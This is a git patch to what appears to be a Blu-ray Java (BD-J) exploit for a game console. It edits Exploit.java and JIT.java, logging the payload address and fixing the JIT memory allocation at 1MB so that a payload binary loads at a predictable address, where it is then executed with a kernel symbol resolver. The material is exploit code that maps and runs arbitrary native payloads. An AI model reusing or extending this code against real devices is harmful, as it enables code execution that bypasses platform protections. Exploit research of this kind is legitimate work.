From 3314b0e7bca60f60bf8be184afe8dd777c1dbbec Mon Sep 17 00:00:00 2001
From: Andy Nguyen <theofficialflow1996@gmail.com>
Date: Wed, 27 Oct 2021 21:12:07 +0200
Subject: [PATCH] Reduce JIT allocation size to 1MB.

---
 com/bdjb/Exploit.java |  5 ++++-
 com/bdjb/JIT.java     | 10 +++++-----
 2 files changed, 9 insertions(+), 6 deletions(-)

diff --git a/com/bdjb/Exploit.java b/com/bdjb/Exploit.java
index 407a4d4..f0bc955 100644
--- a/com/bdjb/Exploit.java
+++ b/com/bdjb/Exploit.java
@@ -79,8 +79,11 @@ class Exploit implements Runnable {
 
       socket.close();
 
-      Screen.println("[*] Executing payload...");
+      Screen.println("[*] Mapping payload...");
       long payload = jit.mapPayload("/OS/HDD/download0/mnt_ada/payload.bin", 0x4000);
+      Screen.println("[+] payload: " + Long.toHexString(payload));
+
+      Screen.println("[*] Executing payload...");
       int ret = (int) api.call(payload, api.dlsym(API.LIBKERNEL_MODULE_HANDLE, "sceKernelDlsym"));
       Screen.println("[+] Result: " + ret);
     } catch (Exception e) {
diff --git a/com/bdjb/JIT.java b/com/bdjb/JIT.java
index 6fb3417..c45acbd 100644
--- a/com/bdjb/JIT.java
+++ b/com/bdjb/JIT.java
@@ -149,12 +149,12 @@ public final class JIT {
       throw new IllegalArgumentException("Invalid data section offset.");
     }
 
-    // TODO: Currently we just use maximum size so that the address is predictable.
-    long size = MAX_CODE_SIZE;
+    // TODO: Currently we hardcode the size so that the address is predictable.
+    long size = 1 * 1024 * 1024;
     //    long size = file.length() + 0x88 + ALIGNMENT - 1;
-    //    if (size >= MAX_CODE_SIZE) {
-    //      throw new IllegalArgumentException("Payload is too big.");
-    //    }
+    if (size >= MAX_CODE_SIZE) {
+      throw new IllegalArgumentException("Payload is too big.");
+    }
 
     // Allocate JIT memory.
     long name = api.malloc(4);